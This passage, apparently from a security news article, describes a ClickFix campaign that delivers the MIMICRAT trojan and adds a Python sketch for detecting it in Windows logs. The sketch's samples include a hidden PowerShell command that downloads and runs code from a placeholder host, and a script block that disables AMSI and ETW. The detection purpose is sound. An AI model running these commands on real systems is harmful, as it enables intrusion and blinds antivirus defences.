Security researchers have identified a cyber-espionage campaign that uses the “ClickFix” social-engineering technique to deliver a custom remote access trojan (RAT) tracked as MIMICRAT. The multi-stage operation relies on compromised legitimate websites to trick users into executing malicious code themselves; it gets past conventional controls through social engineering rather than by exploiting a software vulnerability.
The operation, uncovered in early February 2024 by Elastic’s threat intelligence team, targets organizations across a wide range of industries worldwide. Its multi-stage infection process is built for stealth and persistence, and much of its reach comes from lures that are localized dynamically into 17 languages, so the same compromised site can convincingly address visitors from many regions.
The attack chain begins when a victim visits a legitimate but compromised website, such as one offering financial tools. Malicious JavaScript injected into the site displays a fake Cloudflare verification pop-up instructing the user to copy a PowerShell command and run it, supposedly to fix a browser error. Because the victim pastes and runs the command themselves, no file is downloaded through the browser, so download warnings and Mark-of-the-Web checks such as SmartScreen never get a chance to intervene; this is how “ClickFix” trades an exploit for the user’s trust in a site they already use.
Stealthy Infection and Execution of MIMICRAT
The infection sequence is engineered to evade modern security tooling. The initial PowerShell command downloads a heavily obfuscated second-stage script whose main job is to disable two monitoring hooks that defenders rely on: Event Tracing for Windows (ETW), the channel through which PowerShell emits its script block and module logging, and the Antimalware Scan Interface (AMSI), which hands script content to the installed antivirus or EDR for scanning before it runs. With both blinded, the later stages execute on the victim’s machine with far less chance of raising an alert, which makes the tampering attempt itself one of the best detection opportunities in the chain.
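The two stages described above, the pasted lure command and the AMSI/ETW blinding, each leave a distinct trace in standard Windows telemetry. The following Python sketch is an added example, not code from the campaign or from Elastic, showing how a detection pipeline can pick up both: the pasted command surfaces in process-creation events (Sysmon Event ID 1 or Security 4688) as explorer.exe spawning a shell with a download cradle, and the tampering surfaces in PowerShell script block logs (Event ID 4104) as reflection against well-known class and field names, even when the strings are split or backtick-obfuscated. The event records and script fragment are constructed for illustration, and the regexes, indicator lists and scoring are assumptions for the demo, not the campaign’s actual artifacts.

```python
"""Detection sketch for two stages of the ClickFix -> MIMICRAT chain.

Stage 1: the pasted lure command shows up in process-creation telemetry
         (Sysmon Event ID 1 / Security 4688) as explorer.exe spawning a shell
         with a download cradle.
Stage 2: the AMSI/ETW blinding shows up in PowerShell script block logs
         (Event ID 4104) as reflection against well-known class/field names.

Added example; not code from the campaign or from Elastic. Log records and
the script fragment below are constructed, and the indicator lists and
regexes are assumptions, not the campaign's real artifacts.
"""
import base64
import re

# ---- Stage 1: ClickFix execution pattern ------------------------------------

# A command pasted into the Win+R Run dialog is launched by explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Typical traits of a ClickFix one-liner (regexes are assumptions for the demo).
CRADLE_TRAITS = {
    "hidden window": re.compile(r"-w(?:in(?:dow(?:style)?)?)?\s+h(?:idden)?\b", re.I),
    "policy bypass": re.compile(r"-e(?:p|xec(?:utionpolicy)?)\s+bypass\b", re.I),
    "download cradle": re.compile(
        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I),
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}
ENCODED = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE) decoded, or ''."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_process_event(ev):
    """Score one process-creation event dict. Returns (score, reasons)."""
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if image not in SHELLS:
        return 0, []
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    # Scan the decoded payload too, so -enc does not hide the cradle traits.
    text = cmd + "\n" + decoded
    reasons = [name for name, pat in CRADLE_TRAITS.items() if pat.search(text)]
    if decoded:
        reasons.append("encoded command")
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"spawned by {parent} (user pasted it)")
    return len(reasons), reasons


# ---- Stage 2: AMSI / ETW tampering in script block logs ---------------------

# Public, well-known reflection targets used to blind AMSI and PowerShell's ETW
# provider. Matched case-insensitively after normalization.
TAMPER_INDICATORS = {
    "amsi": ["amsiInitFailed", "AmsiUtils", "AmsiScanBuffer", "amsi.dll"],
    "etw": ["PSEtwLogProvider", "etwProvider", "EtwEventWrite"],
}
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def normalize(script):
    """Undo two cheap obfuscations: backtick escapes and 'Am'+'si' string joins."""
    script = script.replace("`", "")
    prev = None
    while prev != script:  # keep joining until no adjacent string pair is left
        prev = script
        script = _CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), script)
    return script


def tamper_hits(script_block):
    """Return {'amsi': [...], 'etw': [...]} with the indicators present."""
    text = normalize(script_block).lower()
    return {k: [s for s in v if s.lower() in text] for k, v in TAMPER_INDICATORS.items()}


# ---- Constructed samples (not real telemetry) -------------------------------

ENCODED_SAMPLE = base64.b64encode("IEX (IWR http://example.invalid/v)".encode("utf-16-le")).decode()
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/verify)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell -enc {ENCODED_SAMPLE}"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},  # benign baseline
]
SAMPLE_SCRIPT_BLOCK = (
    "[Ref].Assembly.GetType('System.Management.Automation.'+'Amsi'+'Utils')"
    ".GetField('amsiInit'+'Failed','NonPublic,Static').SetValue($null,$true);\n"
    "[Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtw`LogProvider')"
    ".GetField('etwProvider','NonPublic,Static')"
)

if __name__ == "__main__":
    for ev in SAMPLE_PROCESS_EVENTS:
        print(score_process_event(ev))
    print(tamper_hits(SAMPLE_SCRIPT_BLOCK))
```

Two design points matter in practice. First, the parent/child pair is the high-signal part of stage 1: a download cradle launched by a management agent is routine, the same cradle launched by explorer.exe from a user session is not, so the parent check should weigh more than any single command-line regex. Second, script block logging records a block when it is compiled, before it runs, so the 4104 event for the blinding script itself is usually written even though the events after it may stop; an alert on that block, rather than on anything downstream, is the reliable catch for stage 2.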
Once AMSI and ETW are disabled, a Lua-based loader is deployed. It decrypts the final MIMICRAT shellcode and executes it entirely in memory, so the RAT itself never touches disk. That fileless execution sharply reduces what defenders can observe on the host and complicates forensics: the payload has to be recovered from a memory image or a live process rather than from a file. Fileless is not traceless, however: the shell spawned from the user’s session, the initial command in process-creation telemetry and, when it was pasted into the Run dialog, the RunMRU registry key all remain for investigators. The use of a custom Lua loader further obscures the attack